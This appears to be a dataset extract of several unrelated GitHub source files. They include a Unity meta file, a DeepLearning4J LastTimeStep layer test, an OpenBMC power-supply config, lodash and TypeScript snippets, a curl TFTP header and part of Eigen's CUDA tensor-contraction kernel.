text
stringlengths 2
100k
| meta
dict |
---|---|
fileFormatVersion: 2
guid: a77fe3ce6ce59e8459c5f0d7c6011d99
MonoImporter:
externalObjects: {}
serializedVersion: 2
defaultReferences: []
executionOrder: 0
icon: {fileID: 2800000, guid: 424715533f7464745a37e0bacd374d56, type: 3}
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
/*******************************************************************************
* Copyright (c) 2015-2018 Skymind, Inc.
*
* This program and the accompanying materials are made available under the
* terms of the Apache License, Version 2.0 which is available at
* https://www.apache.org/licenses/LICENSE-2.0.
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*
* SPDX-License-Identifier: Apache-2.0
******************************************************************************/
package org.deeplearning4j.nn.layers.recurrent;
import org.deeplearning4j.BaseDL4JTest;
import org.deeplearning4j.TestUtils;
import org.deeplearning4j.nn.api.Layer;
import org.deeplearning4j.nn.conf.ComputationGraphConfiguration;
import org.deeplearning4j.nn.conf.NeuralNetConfiguration;
import org.deeplearning4j.nn.conf.RNNFormat;
import org.deeplearning4j.nn.conf.inputs.InputType;
import org.deeplearning4j.nn.conf.layers.DenseLayer;
import org.deeplearning4j.nn.conf.layers.LSTM;
import org.deeplearning4j.nn.conf.layers.OutputLayer;
import org.deeplearning4j.nn.conf.layers.recurrent.LastTimeStep;
import org.deeplearning4j.nn.conf.layers.recurrent.SimpleRnn;
import org.deeplearning4j.nn.graph.ComputationGraph;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.junit.runners.Parameterized;
import org.nd4j.linalg.api.ndarray.INDArray;
import org.nd4j.linalg.factory.Nd4j;
import org.nd4j.linalg.indexing.NDArrayIndex;
import org.deeplearning4j.nn.workspace.LayerWorkspaceMgr;
import org.nd4j.linalg.learning.config.AdaGrad;
import static org.deeplearning4j.nn.api.OptimizationAlgorithm.STOCHASTIC_GRADIENT_DESCENT;
import static org.deeplearning4j.nn.weights.WeightInit.XAVIER_UNIFORM;
import static org.junit.Assert.*;
import static org.nd4j.linalg.activations.Activation.IDENTITY;
import static org.nd4j.linalg.activations.Activation.TANH;
import static org.nd4j.linalg.lossfunctions.LossFunctions.LossFunction.MSE;
@RunWith(Parameterized.class)
public class TestLastTimeStepLayer extends BaseDL4JTest {
private RNNFormat rnnDataFormat;
public TestLastTimeStepLayer(RNNFormat rnnDataFormat){
this.rnnDataFormat = rnnDataFormat;
}
@Parameterized.Parameters(name="{0}")
public static Object[] params(){
return RNNFormat.values();
}
@Test
public void testLastTimeStepVertex() {
ComputationGraphConfiguration conf = new NeuralNetConfiguration.Builder().graphBuilder().addInputs("in")
.addLayer("lastTS", new LastTimeStep(new SimpleRnn.Builder()
.nIn(5).nOut(6).dataFormat(rnnDataFormat).build()), "in")
.setOutputs("lastTS")
.build();
ComputationGraph graph = new ComputationGraph(conf);
graph.init();
//First: test without input mask array
Nd4j.getRandom().setSeed(12345);
Layer l = graph.getLayer("lastTS");
INDArray in;
if (rnnDataFormat == RNNFormat.NCW){
in = Nd4j.rand(3, 5, 6);
}
else{
in = Nd4j.rand(3, 6, 5);
}
INDArray outUnderlying = ((LastTimeStepLayer)l).getUnderlying().activate(in, false, LayerWorkspaceMgr.noWorkspaces());
INDArray expOut;
if (rnnDataFormat == RNNFormat.NCW){
expOut = outUnderlying.get(NDArrayIndex.all(), NDArrayIndex.all(), NDArrayIndex.point(5));
}
else{
expOut = outUnderlying.get(NDArrayIndex.all(), NDArrayIndex.point(5), NDArrayIndex.all());
}
//Forward pass:
INDArray outFwd = l.activate(in, false, LayerWorkspaceMgr.noWorkspaces());
assertEquals(expOut, outFwd);
//Second: test with input mask array
INDArray inMask = Nd4j.zeros(3, 6);
inMask.putRow(0, Nd4j.create(new double[]{1, 1, 1, 0, 0, 0}));
inMask.putRow(1, Nd4j.create(new double[]{1, 1, 1, 1, 0, 0}));
inMask.putRow(2, Nd4j.create(new double[]{1, 1, 1, 1, 1, 0}));
graph.setLayerMaskArrays(new INDArray[]{inMask}, null);
expOut = Nd4j.zeros(3, 6);
if (rnnDataFormat == RNNFormat.NCW){
expOut.putRow(0, outUnderlying.get(NDArrayIndex.point(0), NDArrayIndex.all(), NDArrayIndex.point(2)));
expOut.putRow(1, outUnderlying.get(NDArrayIndex.point(1), NDArrayIndex.all(), NDArrayIndex.point(3)));
expOut.putRow(2, outUnderlying.get(NDArrayIndex.point(2), NDArrayIndex.all(), NDArrayIndex.point(4)));
}
else{
expOut.putRow(0, outUnderlying.get(NDArrayIndex.point(0), NDArrayIndex.point(2), NDArrayIndex.all()));
expOut.putRow(1, outUnderlying.get(NDArrayIndex.point(1), NDArrayIndex.point(3), NDArrayIndex.all()));
expOut.putRow(2, outUnderlying.get(NDArrayIndex.point(2), NDArrayIndex.point(4), NDArrayIndex.all()));
}
outFwd = l.activate(in, false, LayerWorkspaceMgr.noWorkspaces());
assertEquals(expOut, outFwd);
TestUtils.testModelSerialization(graph);
}
@Test
public void testMaskingAndAllMasked(){
ComputationGraphConfiguration.GraphBuilder builder = new NeuralNetConfiguration.Builder()
.optimizationAlgo(STOCHASTIC_GRADIENT_DESCENT)
.weightInit(XAVIER_UNIFORM)
.activation(TANH)
.updater(new AdaGrad(0.01))
.l2(0.0001)
.seed(1234)
.graphBuilder()
.addInputs("in")
.setInputTypes(InputType.recurrent(1, rnnDataFormat))
.addLayer("RNN", new LastTimeStep(new LSTM.Builder()
.nOut(10).dataFormat(rnnDataFormat)
.build()), "in")
.addLayer("dense", new DenseLayer.Builder()
.nOut(10)
.build(), "RNN")
.addLayer("out", new OutputLayer.Builder()
.activation(IDENTITY)
.lossFunction(MSE)
.nOut(10)
.build(), "dense")
.setOutputs("out");
ComputationGraphConfiguration conf = builder.build();
ComputationGraph cg = new ComputationGraph(conf);
cg.init();
INDArray f = Nd4j.rand(new long[]{1,1,24});
INDArray fm1 = Nd4j.ones(1,24);
INDArray fm2 = Nd4j.zeros(1,24);
INDArray fm3 = Nd4j.zeros(1,24);
fm3.get(NDArrayIndex.point(0), NDArrayIndex.interval(0,5)).assign(1);
if (rnnDataFormat == RNNFormat.NWC){
f = f.permute(0, 2, 1);
}
INDArray[] out1 = cg.output(false, new INDArray[]{f}, new INDArray[]{fm1});
try {
cg.output(false, new INDArray[]{f}, new INDArray[]{fm2});
fail("Expected exception");
} catch (Exception e){
assertTrue(e.getMessage().contains("mask is all 0s"));
}
INDArray[] out3 = cg.output(false, new INDArray[]{f}, new INDArray[]{fm3});
System.out.println(out1[0]);
System.out.println(out3[0]);
assertNotEquals(out1[0], out3[0]);
}
}
| {
"pile_set_name": "Github"
} |
INVENTORY=/system/chassis/motherboard/powersupply3
DEVPATH=/dev/input/by-path/platform-gpio-keys-event
KEY=147
NAME=powersupply3
DRIVERS=/sys/bus/i2c/drivers/ibm-cffps,3-006b
EXTRA_IFACES=xyz.openbmc_project.Inventory.Item.PowerSupply
| {
"pile_set_name": "Github"
} |
export enum SelectDateChangeReason {
date,
time,
button,
format,
custom
}
export interface SelectDateChangeEventArgs {
reason: SelectDateChangeReason;
selectedDate: Date;
}
| {
"pile_set_name": "Github"
} |
import arrayEvery from './_arrayEvery.js';
import createOver from './_createOver.js';
/**
* Creates a function that checks if **all** of the `predicates` return
* truthy when invoked with the arguments it receives.
*
* @static
* @memberOf _
* @since 4.0.0
* @category Util
* @param {...(Function|Function[])} [predicates=[_.identity]]
* The predicates to check.
* @returns {Function} Returns the new function.
* @example
*
* var func = _.overEvery([Boolean, isFinite]);
*
* func('1');
* // => true
*
* func(null);
* // => false
*
* func(NaN);
* // => false
*/
var overEvery = createOver(arrayEvery);
export default overEvery;
| {
"pile_set_name": "Github"
} |
//
// main.m
// GCDExample
//
// Created by Jeff Kelley on 2/18/11.
// Copyright 2011 Jeff Kelley. All rights reserved.
//
#import <UIKit/UIKit.h>
int main(int argc, char *argv[])
{
NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
int retVal = UIApplicationMain(argc, argv, nil, nil);
[pool release];
return retVal;
}
| {
"pile_set_name": "Github"
} |
One.relative_identifier(
1 ^^^ 2,
key: 3 ^^^ 4
) ^^^ Two.relative_identifier(
2 ^^^ 1,
key: 4 ^^^ 3
)
One.relative_identifier(
1 ^^^ 2,
key: 3 ^^^ 4
)(
4 ^^^ 5,
key: 6 ^^^ 7
) ^^^ Two.relative_identifier(
2 ^^^ 1,
key: 4 ^^^ 3
)(
5 ^^^ 4,
key: 7 ^^^ 6
)
One.relative_identifier key: 1 ^^^ 2
One.relative_identifier unqualified 1 ^^^ 2,
key: 3 ^^^ 4
One.relative_identifier 1 ^^^ 2,
key: 3 ^^^ 4
| {
"pile_set_name": "Github"
} |
#ifndef HEADER_CURL_TFTP_H
#define HEADER_CURL_TFTP_H
/***************************************************************************
* _ _ ____ _
* Project ___| | | | _ \| |
* / __| | | | |_) | |
* | (__| |_| | _ <| |___
* \___|\___/|_| \_\_____|
*
* Copyright (C) 1998 - 2007, Daniel Stenberg, <[email protected]>, et al.
*
* This software is licensed as described in the file COPYING, which
* you should have received as part of this distribution. The terms
* are also available at http://curl.haxx.se/docs/copyright.html.
*
* You may opt to use, copy, modify, merge, publish, distribute and/or sell
* copies of the Software, and permit persons to whom the Software is
* furnished to do so, under the terms of the COPYING file.
*
* This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
* KIND, either express or implied.
*
***************************************************************************/
#ifndef CURL_DISABLE_TFTP
extern const struct Curl_handler Curl_handler_tftp;
#endif
#endif /* HEADER_CURL_TFTP_H */
| {
"pile_set_name": "Github"
} |
// This file is part of Eigen, a lightweight C++ template library
// for linear algebra.
//
// Copyright (C) 2014-2015 Benoit Steiner <[email protected]>
// Copyright (C) 2015 Navdeep Jaitly <[email protected]>
// Copyright (C) 2014 Eric Martin <[email protected]>
//
// This Source Code Form is subject to the terms of the Mozilla
// Public License v. 2.0. If a copy of the MPL was not distributed
// with this file, You can obtain one at http://mozilla.org/MPL/2.0/.
#ifndef EIGEN_CXX11_TENSOR_TENSOR_CONTRACTION_CUDA_H
#define EIGEN_CXX11_TENSOR_TENSOR_CONTRACTION_CUDA_H
#if defined(EIGEN_USE_GPU) && defined(__CUDACC__)
namespace Eigen {
template<typename Scalar, typename Index, typename LhsMapper,
typename RhsMapper, typename OutputMapper, bool needs_edge_check>
__device__ EIGEN_STRONG_INLINE void
EigenContractionKernelInternal(const LhsMapper lhs, const RhsMapper rhs,
const OutputMapper output, Scalar* lhs_shmem, Scalar* rhs_shmem,
const Index m_size, const Index n_size, const Index k_size) {
const Index m_block_idx = blockIdx.x;
const Index n_block_idx = blockIdx.y;
const Index base_m = 64 * m_block_idx;
const Index base_n = 64 * n_block_idx;
// declare and initialize 64 registers for output 8x8 block
// prefetch registers
Scalar lhs_pf0;
Scalar lhs_pf1;
Scalar lhs_pf2;
Scalar lhs_pf3;
Scalar lhs_pf4;
Scalar lhs_pf5;
Scalar lhs_pf6;
Scalar lhs_pf7;
Scalar rhs_pf0;
Scalar rhs_pf1;
Scalar rhs_pf2;
Scalar rhs_pf3;
Scalar rhs_pf4;
Scalar rhs_pf5;
Scalar rhs_pf6;
Scalar rhs_pf7;
// shared memory is formatted
// (contract idx in block, nocontract idx in block, block idx)
// where block idx is column major. This transposition limits the number of
// bank conflicts when reading the LHS. The core idea is that since the contracting
// index is shared by both sides, then the contracting index should be in threadIdx.x.
// On the LHS, we pad each row inside of each block with an extra element. This makes
// each block 8 rows of 9 elements, which is 72 elements. This gives no bank conflicts
// on writes and very few 2-way conflicts on reads. There is an 8x8 grid of these blocks.
// On the RHS we just add 8 padding elements to the end of each block. This gives no bank
// conflicts on writes and also none on reads.
// storage indices
const Index lhs_store_idx_base = threadIdx.y * 72 + threadIdx.x * 9 + threadIdx.z;
const Index rhs_store_idx_base = threadIdx.y * 72 + threadIdx.z * 8 + threadIdx.x;
const Index lhs_store_idx_0 = lhs_store_idx_base + 576 * 0;
const Index lhs_store_idx_1 = lhs_store_idx_base + 576 * 1;
const Index lhs_store_idx_2 = lhs_store_idx_base + 576 * 2;
const Index lhs_store_idx_3 = lhs_store_idx_base + 576 * 3;
const Index lhs_store_idx_4 = lhs_store_idx_base + 576 * 4;
const Index lhs_store_idx_5 = lhs_store_idx_base + 576 * 5;
const Index lhs_store_idx_6 = lhs_store_idx_base + 576 * 6;
const Index lhs_store_idx_7 = lhs_store_idx_base + 576 * 7;
const Index rhs_store_idx_0 = rhs_store_idx_base + 576 * 0;
const Index rhs_store_idx_1 = rhs_store_idx_base + 576 * 1;
const Index rhs_store_idx_2 = rhs_store_idx_base + 576 * 2;
const Index rhs_store_idx_3 = rhs_store_idx_base + 576 * 3;
const Index rhs_store_idx_4 = rhs_store_idx_base + 576 * 4;
const Index rhs_store_idx_5 = rhs_store_idx_base + 576 * 5;
const Index rhs_store_idx_6 = rhs_store_idx_base + 576 * 6;
const Index rhs_store_idx_7 = rhs_store_idx_base + 576 * 7;
// in the loading code, the following variables are important:
// threadIdx.x: the vertical position in an 8x8 block
// threadIdx.y: the vertical index of the 8x8 block in the grid
// threadIdx.z: the horizontal position in an 8x8 block
// k: the horizontal index of the 8x8 block in the grid
//
// The k parameter is implicit (it was the loop counter for a loop that went
// from 0 to <8, but now that loop is unrolled in the below code.
const Index load_idx_vert = threadIdx.x + 8 * threadIdx.y;
const Index lhs_vert = base_m + load_idx_vert;
#define prefetchIntoRegisters(base_k) \
{ \
lhs_pf0 = conv(0); \
lhs_pf1 = conv(0); \
lhs_pf2 = conv(0); \
lhs_pf3 = conv(0); \
lhs_pf4 = conv(0); \
lhs_pf5 = conv(0); \
lhs_pf6 = conv(0); \
lhs_pf7 = conv(0); \
\
rhs_pf0 = conv(0); \
rhs_pf1 = conv(0); \
rhs_pf2 = conv(0); \
rhs_pf3 = conv(0); \
rhs_pf4 = conv(0); \
rhs_pf5 = conv(0); \
rhs_pf6 = conv(0); \
rhs_pf7 = conv(0); \
\
if (!needs_edge_check || lhs_vert < m_size) { \
const Index lhs_horiz_0 = base_k + threadIdx.z + 0 * 8; \
const Index lhs_horiz_1 = base_k + threadIdx.z + 1 * 8; \
const Index lhs_horiz_2 = base_k + threadIdx.z + 2 * 8; \
const Index lhs_horiz_3 = base_k + threadIdx.z + 3 * 8; \
const Index lhs_horiz_4 = base_k + threadIdx.z + 4 * 8; \
const Index lhs_horiz_5 = base_k + threadIdx.z + 5 * 8; \
const Index lhs_horiz_6 = base_k + threadIdx.z + 6 * 8; \
const Index lhs_horiz_7 = base_k + threadIdx.z + 7 * 8; \
\
if (!needs_edge_check || lhs_horiz_7 < k_size) { \
lhs_pf0 = lhs(lhs_vert, lhs_horiz_0); \
lhs_pf1 = lhs(lhs_vert, lhs_horiz_1); \
lhs_pf2 = lhs(lhs_vert, lhs_horiz_2); \
lhs_pf3 = lhs(lhs_vert, lhs_horiz_3); \
lhs_pf4 = lhs(lhs_vert, lhs_horiz_4); \
lhs_pf5 = lhs(lhs_vert, lhs_horiz_5); \
lhs_pf6 = lhs(lhs_vert, lhs_horiz_6); \
lhs_pf7 = lhs(lhs_vert, lhs_horiz_7); \
} else if (lhs_horiz_6 < k_size) { \
lhs_pf0 = lhs(lhs_vert, lhs_horiz_0); \
lhs_pf1 = lhs(lhs_vert, lhs_horiz_1); \
lhs_pf2 = lhs(lhs_vert, lhs_horiz_2); \
lhs_pf3 = lhs(lhs_vert, lhs_horiz_3); \
lhs_pf4 = lhs(lhs_vert, lhs_horiz_4); \
lhs_pf5 = lhs(lhs_vert, lhs_horiz_5); \
lhs_pf6 = lhs(lhs_vert, lhs_horiz_6); \
} else if (lhs_horiz_5 < k_size) { \
lhs_pf0 = lhs(lhs_vert, lhs_horiz_0); \
lhs_pf1 = lhs(lhs_vert, lhs_horiz_1); \
lhs_pf2 = lhs(lhs_vert, lhs_horiz_2); \
lhs_pf3 = lhs(lhs_vert, lhs_horiz_3); \
lhs_pf4 = lhs(lhs_vert, lhs_horiz_4); \
lhs_pf5 = lhs(lhs_vert, lhs_horiz_5); \
} else if (lhs_horiz_4 < k_size) { \
lhs_pf0 = lhs(lhs_vert, lhs_horiz_0); \
lhs_pf1 = lhs(lhs_vert, lhs_horiz_1); \
lhs_pf2 = lhs(lhs_vert, lhs_horiz_2); \
lhs_pf3 = lhs(lhs_vert, lhs_horiz_3); \
lhs_pf4 = lhs(lhs_vert, lhs_horiz_4); \
} else if (lhs_horiz_3 < k_size) { \
lhs_pf0 = lhs(lhs_vert, lhs_horiz_0); \
lhs_pf1 = lhs(lhs_vert, lhs_horiz_1); \
lhs_pf2 = lhs(lhs_vert, lhs_horiz_2); \
lhs_pf3 = lhs(lhs_vert, lhs_horiz_3); \
} else if (lhs_horiz_2 < k_size) { \
lhs_pf0 = lhs(lhs_vert, lhs_horiz_0); \
lhs_pf1 = lhs(lhs_vert, lhs_horiz_1); \
lhs_pf2 = lhs(lhs_vert, lhs_horiz_2); \
} else if (lhs_horiz_1 < k_size) { \
lhs_pf0 = lhs(lhs_vert, lhs_horiz_0); \
lhs_pf1 = lhs(lhs_vert, lhs_horiz_1); \
} else if (lhs_horiz_0 < k_size) { \
lhs_pf0 = lhs(lhs_vert, lhs_horiz_0); \
} \
} \
\
const Index rhs_vert = base_k + load_idx_vert; \
if (!needs_edge_check || rhs_vert < k_size) { \
const Index rhs_horiz_0 = base_n + threadIdx.z + 0 * 8; \
const Index rhs_horiz_1 = base_n + threadIdx.z + 1 * 8; \
const Index rhs_horiz_2 = base_n + threadIdx.z + 2 * 8; \
const Index rhs_horiz_3 = base_n + threadIdx.z + 3 * 8; \
const Index rhs_horiz_4 = base_n + threadIdx.z + 4 * 8; \
const Index rhs_horiz_5 = base_n + threadIdx.z + 5 * 8; \
const Index rhs_horiz_6 = base_n + threadIdx.z + 6 * 8; \
const Index rhs_horiz_7 = base_n + threadIdx.z + 7 * 8; \
\
if (rhs_horiz_7 < n_size) { \
rhs_pf0 = rhs(rhs_vert, rhs_horiz_0); \
rhs_pf1 = rhs(rhs_vert, rhs_horiz_1); \
rhs_pf2 = rhs(rhs_vert, rhs_horiz_2); \
rhs_pf3 = rhs(rhs_vert, rhs_horiz_3); \
rhs_pf4 = rhs(rhs_vert, rhs_horiz_4); \
rhs_pf5 = rhs(rhs_vert, rhs_horiz_5); \
rhs_pf6 = rhs(rhs_vert, rhs_horiz_6); \
rhs_pf7 = rhs(rhs_vert, rhs_horiz_7); \
} else if (rhs_horiz_6 < n_size) { \
rhs_pf0 = rhs(rhs_vert, rhs_horiz_0); \
rhs_pf1 = rhs(rhs_vert, rhs_horiz_1); \
rhs_pf2 = rhs(rhs_vert, rhs_horiz_2); \
rhs_pf3 = rhs(rhs_vert, rhs_horiz_3); \
rhs_pf4 = rhs(rhs_vert, rhs_horiz_4); \
rhs_pf5 = rhs(rhs_vert, rhs_horiz_5); \
rhs_pf6 = rhs(rhs_vert, rhs_horiz_6); \
} else if (rhs_horiz_5 < n_size) { \
rhs_pf0 = rhs(rhs_vert, rhs_horiz_0); \
rhs_pf1 = rhs(rhs_vert, rhs_horiz_1); \
rhs_pf2 = rhs(rhs_vert, rhs_horiz_2); \
rhs_pf3 = rhs(rhs_vert, rhs_horiz_3); \
rhs_pf4 = rhs(rhs_vert, rhs_horiz_4); \
rhs_pf5 = rhs(rhs_vert, rhs_horiz_5); \
} else if (rhs_horiz_4 < n_size) { \
rhs_pf0 = rhs(rhs_vert, rhs_horiz_0); \
rhs_pf1 = rhs(rhs_vert, rhs_horiz_1); \
rhs_pf2 = rhs(rhs_vert, rhs_horiz_2); \
rhs_pf3 = rhs(rhs_vert, rhs_horiz_3); \
rhs_pf4 = rhs(rhs_vert, rhs_horiz_4); \
} else if (rhs_horiz_3 < n_size) { \
rhs_pf0 = rhs(rhs_vert, rhs_horiz_0); \
rhs_pf1 = rhs(rhs_vert, rhs_horiz_1); \
rhs_pf2 = rhs(rhs_vert, rhs_horiz_2); \
rhs_pf3 = rhs(rhs_vert, rhs_horiz_3); \
} else if (rhs_horiz_2 < n_size) { \
rhs_pf0 = rhs(rhs_vert, rhs_horiz_0); \
rhs_pf1 = rhs(rhs_vert, rhs_horiz_1); \
rhs_pf2 = rhs(rhs_vert, rhs_horiz_2); \
} else if (rhs_horiz_1 < n_size) { \
rhs_pf0 = rhs(rhs_vert, rhs_horiz_0); \
rhs_pf1 = rhs(rhs_vert, rhs_horiz_1); \
} else if (rhs_horiz_0 < n_size) { \
rhs_pf0 = rhs(rhs_vert, rhs_horiz_0); \
} \
} \
} \
#define writeRegToShmem(_) \
lhs_shmem[lhs_store_idx_0] = lhs_pf0; \
rhs_shmem[rhs_store_idx_0] = rhs_pf0; \
\
lhs_shmem[lhs_store_idx_1] = lhs_pf1; \
rhs_shmem[rhs_store_idx_1] = rhs_pf1; \
\
lhs_shmem[lhs_store_idx_2] = lhs_pf2; \
rhs_shmem[rhs_store_idx_2] = rhs_pf2; \
\
lhs_shmem[lhs_store_idx_3] = lhs_pf3; \
rhs_shmem[rhs_store_idx_3] = rhs_pf3; \
\
lhs_shmem[lhs_store_idx_4] = lhs_pf4; \
rhs_shmem[rhs_store_idx_4] = rhs_pf4; \
\
lhs_shmem[lhs_store_idx_5] = lhs_pf5; \
rhs_shmem[rhs_store_idx_5] = rhs_pf5; \
\
lhs_shmem[lhs_store_idx_6] = lhs_pf6; \
rhs_shmem[rhs_store_idx_6] = rhs_pf6; \
\
lhs_shmem[lhs_store_idx_7] = lhs_pf7; \
rhs_shmem[rhs_store_idx_7] = rhs_pf7; \
// declare and initialize result array
#define res(i, j) _res_##i##j
#define initResultRow(i) \
Scalar res(i, 0) = conv(0); \
Scalar res(i, 1) = conv(0); \
Scalar res(i, 2) = conv(0); \
Scalar res(i, 3) = conv(0); \
Scalar res(i, 4) = conv(0); \
Scalar res(i, 5) = conv(0); \
Scalar res(i, 6) = conv(0); \
Scalar res(i, 7) = conv(0); \
internal::scalar_cast_op<int, Scalar> conv;
initResultRow(0);
initResultRow(1);
initResultRow(2);
initResultRow(3);
initResultRow(4);
initResultRow(5);
initResultRow(6);
initResultRow(7);
#undef initResultRow
for (Index base_k = 0; base_k < k_size; base_k += 64) {
// wait for previous iteration to finish with shmem. Despite common sense,
// the code is a bit faster with this here then at bottom of loop
__syncthreads();
prefetchIntoRegisters(base_k);
writeRegToShmem();
#undef prefetchIntoRegisters
#undef writeRegToShmem
// wait for shared mem packing to be done before starting computation
__syncthreads();
// compute 8x8 matrix product by outer product. This involves packing one column
// of LHS and one row of RHS into registers (takes 16 registers).
#define lcol(i) _lcol##i
Scalar lcol(0);
Scalar lcol(1);
Scalar lcol(2);
Scalar lcol(3);
Scalar lcol(4);
Scalar lcol(5);
Scalar lcol(6);
Scalar lcol(7);
#define rrow(j) _rrow##j
Scalar rrow(0);
Scalar rrow(1);
Scalar rrow(2);
Scalar rrow(3);
Scalar rrow(4);
Scalar rrow(5);
Scalar rrow(6);
Scalar rrow(7);
// Now x corresponds to k, y to m, and z to n
const Scalar* lhs_block = &lhs_shmem[threadIdx.x + 9 * threadIdx.y];
const Scalar* rhs_block = &rhs_shmem[threadIdx.x + 8 * threadIdx.z];
#define lhs_element(i, j) lhs_block[72 * ((i) + 8 * (j))]
#define rhs_element(i, j) rhs_block[72 * ((i) + 8 * (j))]
#define loadData(i, j) \
lcol(0) = lhs_element(0, j); \
rrow(0) = rhs_element(i, 0); \
lcol(1) = lhs_element(1, j); \
rrow(1) = rhs_element(i, 1); \
lcol(2) = lhs_element(2, j); \
rrow(2) = rhs_element(i, 2); \
lcol(3) = lhs_element(3, j); \
rrow(3) = rhs_element(i, 3); \
lcol(4) = lhs_element(4, j); \
rrow(4) = rhs_element(i, 4); \
lcol(5) = lhs_element(5, j); \
rrow(5) = rhs_element(i, 5); \
lcol(6) = lhs_element(6, j); \
rrow(6) = rhs_element(i, 6); \
lcol(7) = lhs_element(7, j); \
rrow(7) = rhs_element(i, 7); \
#define computeCol(j) \
res(0, j) += lcol(0) * rrow(j); \
res(1, j) += lcol(1) * rrow(j); \
res(2, j) += lcol(2) * rrow(j); \
res(3, j) += lcol(3) * rrow(j); \
res(4, j) += lcol(4) * rrow(j); \
res(5, j) += lcol(5) * rrow(j); \
res(6, j) += lcol(6) * rrow(j); \
res(7, j) += lcol(7) * rrow(j); \
#define computePass(i) \
loadData(i, i); \
\
computeCol(0); \
computeCol(1); \
computeCol(2); \
computeCol(3); \
computeCol(4); \
computeCol(5); \
computeCol(6); \
computeCol(7); \
computePass(0);
computePass(1);
computePass(2);
computePass(3);
computePass(4);
computePass(5);
computePass(6);
computePass(7);
#undef lcol
#undef rrow
#undef lhs_element
#undef rhs_element
#undef loadData
#undef computeCol
#undef computePass
} // end loop over k
// we've now iterated over all of the large (ie width 64) k blocks and
// accumulated results in registers. At this point thread (x, y, z) contains
// the sum across all big k blocks of the product of little k block of index (x, y)
// with block of index (y, z). To compute the final output, we need to reduce
// the 8 threads over y by summation.
#define shuffleInc(i, j, mask) res(i, j) += __shfl_xor(res(i, j), mask)
#define reduceRow(i, mask) \
shuffleInc(i, 0, mask); \
shuffleInc(i, 1, mask); \
shuffleInc(i, 2, mask); \
shuffleInc(i, 3, mask); \
shuffleInc(i, 4, mask); \
shuffleInc(i, 5, mask); \
shuffleInc(i, 6, mask); \
shuffleInc(i, 7, mask); \
#define reduceMatrix(mask) \
reduceRow(0, mask); \
reduceRow(1, mask); \
reduceRow(2, mask); \
reduceRow(3, mask); \
reduceRow(4, mask); \
reduceRow(5, mask); \
reduceRow(6, mask); \
reduceRow(7, mask); \
// actually perform the reduction, now each thread of index (_, y, z)
// contains the correct values in its registers that belong in the output
// block
reduceMatrix(1);
reduceMatrix(2);
reduceMatrix(4);
#undef shuffleInc
#undef reduceRow
#undef reduceMatrix
// now we need to copy the 64 values into main memory. We can't split work
// among threads because all variables are in registers. There's 2 ways
// to do this:
// (1) have 1 thread do 64 writes from registers into global memory
// (2) have 1 thread do 64 writes into shared memory, and then 8 threads
// each do 8 writes into global memory. We can just overwrite the shared
// memory from the problem we just solved.
// (2) is slightly faster than (1) due to less branching and more ILP
// TODO: won't yield much gain, but could just use currently unused shared mem
// and then we won't have to sync
// wait for shared mem to be out of use
__syncthreads();
#define writeResultShmem(i, j) \
lhs_shmem[i + 8 * threadIdx.y + 64 * threadIdx.z + 512 * j] = res(i, j); \
#define writeRow(i) \
writeResultShmem(i, 0); \
writeResultShmem(i, 1); \
writeResultShmem(i, 2); \
writeResultShmem(i, 3); \
writeResultShmem(i, 4); \
writeResultShmem(i, 5); \
writeResultShmem(i, 6); \
writeResultShmem(i, 7); \
if (threadIdx.x == 0) {
writeRow(0);
writeRow(1);
writeRow(2);
writeRow(3);
writeRow(4);
writeRow(5);
writeRow(6);
writeRow(7);
}
#undef writeResultShmem
#undef writeRow
const int max_i_write = numext::mini((int)((m_size - base_m - threadIdx.y + 7) / 8), 8);
const int max_j_write = numext::mini((int)((n_size - base_n - threadIdx.z + 7) / 8), 8);
if (threadIdx.x < max_i_write) {
if (max_j_write == 8) {
// TODO: can i trade bank conflicts for coalesced writes?
Scalar val0 = lhs_shmem[threadIdx.x + 8 * threadIdx.y + 64 * threadIdx.z + 512 * 0];
Scalar val1 = lhs_shmem[threadIdx.x + 8 * threadIdx.y + 64 * threadIdx.z + 512 * 1];
Scalar val2 = lhs_shmem[threadIdx.x + 8 * threadIdx.y + 64 * threadIdx.z + 512 * 2];
Scalar val3 = lhs_shmem[threadIdx.x + 8 * threadIdx.y + 64 * threadIdx.z + 512 * 3];
Scalar val4 = lhs_shmem[threadIdx.x + 8 * threadIdx.y + 64 * threadIdx.z + 512 * 4];
Scalar val5 = lhs_shmem[threadIdx.x + 8 * threadIdx.y + 64 * threadIdx.z + 512 * 5];
Scalar val6 = lhs_shmem[threadIdx.x + 8 * threadIdx.y + 64 * threadIdx.z + 512 * 6];
Scalar val7 = lhs_shmem[threadIdx.x + 8 * threadIdx.y + 64 * threadIdx.z + 512 * 7];
output(base_m + threadIdx.y + 8 * threadIdx.x, base_n + threadIdx.z + 8 * 0) = val0;
output(base_m + threadIdx.y + 8 * threadIdx.x, base_n + threadIdx.z + 8 * 1) = val1;
output(base_m + threadIdx.y + 8 * threadIdx.x, base_n + threadIdx.z + 8 * 2) = val2;
output(base_m + threadIdx.y + 8 * threadIdx.x, base_n + threadIdx.z + 8 * 3) = val3;
output(base_m + threadIdx.y + 8 * threadIdx.x, base_n + threadIdx.z + 8 * 4) = val4;
output(base_m + threadIdx.y + 8 * threadIdx.x, base_n + threadIdx.z + 8 * 5) = val5;
output(base_m + threadIdx.y + 8 * threadIdx.x, base_n + threadIdx.z + 8 * 6) = val6;
output(base_m + threadIdx.y + 8 * threadIdx.x, base_n + threadIdx.z + 8 * 7) = val7;
} else {
#pragma unroll 7
for (int j = 0; j < max_j_write; j++) {
Scalar val = lhs_shmem[threadIdx.x + 8 * threadIdx.y + 64 * threadIdx.z + 512 * j];
output(base_m + threadIdx.y + 8 * threadIdx.x, base_n + threadIdx.z + 8 * j) = val;
}
}
}
#undef res
}
template<typename Scalar, typename Index, typename LhsMapper,
typename RhsMapper, typename OutputMapper>
__global__ void
__launch_bounds__(512)
EigenContractionKernel(const LhsMapper lhs, const RhsMapper rhs,
const OutputMapper output,
const Index m_size, const Index n_size, const Index k_size) {
__shared__ Scalar lhs_shmem[72 * 64];
__shared__ Scalar rhs_shmem[72 * 64];
const Index m_block_idx = blockIdx.x;
const Index n_block_idx = blockIdx.y;
const Index base_m = 64 * m_block_idx;
const Index base_n = 64 * n_block_idx;
